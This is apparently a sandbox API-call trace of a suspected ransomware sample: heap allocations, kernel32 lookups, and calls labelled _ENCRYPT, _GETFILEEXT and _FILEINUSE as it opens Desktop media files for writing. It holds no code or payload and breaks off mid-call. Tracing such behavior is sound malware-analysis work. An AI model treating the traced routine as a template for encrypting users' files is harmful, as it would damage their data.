HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.493] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0168.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0168.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.495] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0168.496] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0168.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0168.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0168.497] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.497] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0168.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0168.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.498] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0168.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0168.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.498] CloseHandle (hObject=0x138) returned 1 [0168.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.499] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.500] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0168.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.500] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0168.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.500] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.500] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0168.501] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0168.501] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.501] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0168.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.501] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.501] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.502] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zkkA.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4813c0, ftCreationTime.dwHighDateTime=0x1d5dda2, ftLastAccessTime.dwLowDateTime=0xa7eda190, ftLastAccessTime.dwHighDateTime=0x1d5dde7, ftLastWriteTime.dwLowDateTime=0xa7eda190, ftLastWriteTime.dwHighDateTime=0x1d5dde7, nFileSizeHigh=0x0, nFileSizeLow=0xa2f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zkkA.wav", cAlternateFileName="")) returned 0x90add8 [0168.502] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.502] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.502] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zkkA.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4813c0, ftCreationTime.dwHighDateTime=0x1d5dda2, ftLastAccessTime.dwLowDateTime=0xa7eda190, ftLastAccessTime.dwHighDateTime=0x1d5dde7, ftLastWriteTime.dwLowDateTime=0xa7eda190, ftLastWriteTime.dwHighDateTime=0x1d5dde7, nFileSizeHigh=0x0, nFileSizeLow=0xa2f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="zkkA.wav", cAlternateFileName="")) returned 0x90add8 [0168.502] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.502] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.502] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.502] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.503] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.503] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.503] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.503] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.503] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.503] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0168.503] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.504] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_ilndjr.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.505] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.505] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.505] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.505] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0168.505] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.506] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.506] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.506] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0168.506] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.507] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0168.507] PeekMessageW 